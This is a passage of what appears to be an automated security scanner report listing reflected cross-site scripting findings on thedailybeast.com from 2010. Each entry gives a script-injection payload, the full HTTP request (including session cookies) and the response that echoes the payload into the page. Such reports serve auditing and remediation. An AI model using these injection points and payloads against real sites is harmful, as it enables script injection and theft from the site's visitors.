The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16dc8"><script>alert(1)</script>c7aa2ea2192 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker/sexybeast/picture-show16dc8"><script>alert(1)</script>c7aa2ea2192/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker/sexybeast/picture-show16dc8"><script>alert(1)</script>c7aa2ea2192/"/>
...[SNIP]...

1.59. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/red-carpet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 732d1"><script>alert(1)</script>977331ba64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries732d1"><script>alert(1)</script>977331ba64/newsmaker/sexybeast/red-carpet/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries732d1"><script>alert(1)</script>977331ba64/newsmaker/sexybeast/red-carpet/"/>
...[SNIP]...

1.60. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/red-carpet/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e13ab"><script>alert(1)</script>5a87c851130 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmakere13ab"><script>alert(1)</script>5a87c851130/sexybeast/red-carpet/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmakere13ab"><script>alert(1)</script>5a87c851130/sexybeast/red-carpet/"/>
...[SNIP]...

1.61. http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /galleries/newsmaker/sexybeast/red-carpet/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 796db"><script>alert(1)</script>9b9f49e2b7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /galleries/newsmaker/sexybeast/red-carpet796db"><script>alert(1)</script>9b9f49e2b7d/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/galleries/newsmaker/sexybeast/red-carpet796db"><script>alert(1)</script>9b9f49e2b7d/"/>
...[SNIP]...

1.62. http://www.thedailybeast.com/newsmaker/art-and-photography/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/art-and-photography/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9545b"><script>alert(1)</script>c2484a9bd2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker9545b"><script>alert(1)</script>c2484a9bd2c/art-and-photography/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:53:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker9545b"><script>alert(1)</script>c2484a9bd2c/art-and-photography/"/>
...[SNIP]...

1.63. http://www.thedailybeast.com/newsmaker/book-beast/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/book-beast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc56"><script>alert(1)</script>6f5fb25565f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmakerbbc56"><script>alert(1)</script>6f5fb25565f/book-beast/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:53:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmakerbbc56"><script>alert(1)</script>6f5fb25565f/book-beast/"/>
...[SNIP]...

1.64. http://www.thedailybeast.com/newsmaker/giving-beast/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/giving-beast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e22"><script>alert(1)</script>0da5f453b9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker49e22"><script>alert(1)</script>0da5f453b9c/giving-beast/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:53:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker49e22"><script>alert(1)</script>0da5f453b9c/giving-beast/"/>
...[SNIP]...

1.65. http://www.thedailybeast.com/newsmaker/hungry-beast/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/hungry-beast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3e4a"><script>alert(1)</script>401d4bdd7ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmakera3e4a"><script>alert(1)</script>401d4bdd7ff/hungry-beast/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:53:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmakera3e4a"><script>alert(1)</script>401d4bdd7ff/hungry-beast/"/>
...[SNIP]...

1.66. http://www.thedailybeast.com/newsmaker/innovation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/innovation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29852"><script>alert(1)</script>c1a9bb7aefe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker29852"><script>alert(1)</script>c1a9bb7aefe/innovation/ HTTP/1.1
Host: www.thedailybeast.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=157974911.245470979.1289685366.1289685366.1289685366.1; __utmc=157974911; __utmb=157974911.1.10.1289685366; __unam=c84b8fc-12c473cf84c-7e5976b8-1; __qca=P0-1101498677-1289685372894; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:57 GMT
Connection: close
Content-Length: 96229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker29852"><script>alert(1)</script>c1a9bb7aefe/innovation/"/>
...[SNIP]...

1.67. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/innovation/tweet-sheet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 352ed"><script>alert(1)</script>caf4a276ba5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker352ed"><script>alert(1)</script>caf4a276ba5/innovation/tweet-sheet/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker352ed"><script>alert(1)</script>caf4a276ba5/innovation/tweet-sheet/"/>
...[SNIP]...

1.68. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/innovation/tweet-sheet/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 347e9"><script>alert(1)</script>7cb016d9715 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker/innovation/tweet-sheet347e9"><script>alert(1)</script>7cb016d9715/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet347e9"><script>alert(1)</script>7cb016d9715/"/>
...[SNIP]...

1.69. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/joel-makower34534/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/innovation/tweet-sheet/joel-makower34534/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f63"><script>alert(1)</script>9ed2ea6d817 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmakerd7f63"><script>alert(1)</script>9ed2ea6d817/innovation/tweet-sheet/joel-makower34534/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:04:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmakerd7f63"><script>alert(1)</script>9ed2ea6d817/innovation/tweet-sheet/joel-makower34534/"/>
...[SNIP]...

1.70. http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet/joel-makower34534/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/innovation/tweet-sheet/joel-makower34534/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba48"><script>alert(1)</script>80e4d21e7d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker/innovation/tweet-sheet7ba48"><script>alert(1)</script>80e4d21e7d3/joel-makower34534/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker/innovation/tweet-sheet7ba48"><script>alert(1)</script>80e4d21e7d3/joel-makower34534/"/>
...[SNIP]...

1.71. http://www.thedailybeast.com/newsmaker/new-york-fashion-week/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/new-york-fashion-week/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb3eb"><script>alert(1)</script>58d47f8e9b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmakerfb3eb"><script>alert(1)</script>58d47f8e9b5/new-york-fashion-week/ HTTP/1.1
Host: www.thedailybeast.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=157974911.245470979.1289685366.1289685366.1289685366.1; __utmc=157974911; __utmb=157974911.1.10.1289685366; __unam=c84b8fc-12c473cf84c-7e5976b8-1; __qca=P0-1101498677-1289685372894; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:00 GMT
Connection: close
Content-Length: 96284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmakerfb3eb"><script>alert(1)</script>58d47f8e9b5/new-york-fashion-week/"/>
...[SNIP]...

1.72. http://www.thedailybeast.com/newsmaker/politics/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/politics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac199"><script>alert(1)</script>afaff540528 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmakerac199"><script>alert(1)</script>afaff540528/politics/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.thedailybeast.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:00:17 GMT
Connection: close
Content-Length: 96219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmakerac199"><script>alert(1)</script>afaff540528/politics/"/>
...[SNIP]...

1.73. http://www.thedailybeast.com/newsmaker/sexybeast/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/sexybeast/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49168"><script>alert(1)</script>d3a726ee72a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmaker49168"><script>alert(1)</script>d3a726ee72a/sexybeast/ HTTP/1.1
Host: www.thedailybeast.com
Proxy-Connection: keep-alive
Referer: http://www.thedailybeast.com/newsmaker/politics/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=157974911.245470979.1289685366.1289685366.1289685366.1; __utmc=157974911; __utmb=157974911.1.10.1289685366; __unam=c84b8fc-12c473cf84c-7e5976b8-1; __qca=P0-1101498677-1289685372894; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:01:03 GMT
Connection: close
Content-Length: 96224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/newsmaker49168"><script>alert(1)</script>d3a726ee72a/sexybeast/"/>
...[SNIP]...

1.74. http://www.thedailybeast.com/newsmaker/sexybeast/tweet-sheet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /newsmaker/sexybeast/tweet-sheet/

Issue detail

